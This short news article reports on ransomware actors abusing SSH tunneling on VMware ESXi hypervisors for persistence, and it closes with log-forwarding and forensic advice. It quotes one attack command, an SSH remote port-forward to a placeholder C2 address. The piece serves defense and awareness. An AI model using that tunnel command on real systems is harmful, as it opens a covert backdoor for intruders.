Ransomware actors are increasingly targeting VMware ESXi bare-metal hypervisors, exploiting SSH tunneling to maintain persistent, undetected access to compromised systems.
According to cybersecurity firm Sygnia, threat actors are leveraging known vulnerabilities in ESXi appliances or exploiting compromised administrator credentials to gain initial access. Once inside, they exploit the hypervisor’s built-in SSH service, designed to allow system administrators to remotely manage the device. This service, however, is rarely monitored by many organizations, making it an attractive vector for attackers.
Ransomware actors are abusing the feature to establish persistence, move laterally within the network, and deploy ransomware payloads.
By using SSH tunneling, attackers can securely route traffic between the compromised hypervisor and external command-and-control (C2) servers.
For example, attackers can set up a remote port-forwarding configuration via SSH to establish a connection back to the C2 server, using a command such as ssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>. This allows attackers to tunnel through the hypervisor and remain undetected for prolonged periods.
“Since ESXi appliances are resilient and rarely shutdown unexpectedly, this tunneling serves as a semi-persistent backdoor within the network,” the researchers noted.
ESXi appliances use a distributed logging mechanism that separates log entries into multiple dedicated files, rather than consolidating them into one, as seen with traditional syslog formats. This approach, while organized, can complicate forensic investigations since logs are spread across various files.
To address this, configuring log forwarding from ESXi to an external syslog server is recommended for centralized monitoring and log retention. This setup ensures all relevant events are captured in one location. Key log files for investigating potential attacks, such as SSH tunneling, include /var/log/shell.log, /var/log/hostd.log, /var/log/auth.log, and /var/log/vobd.log.
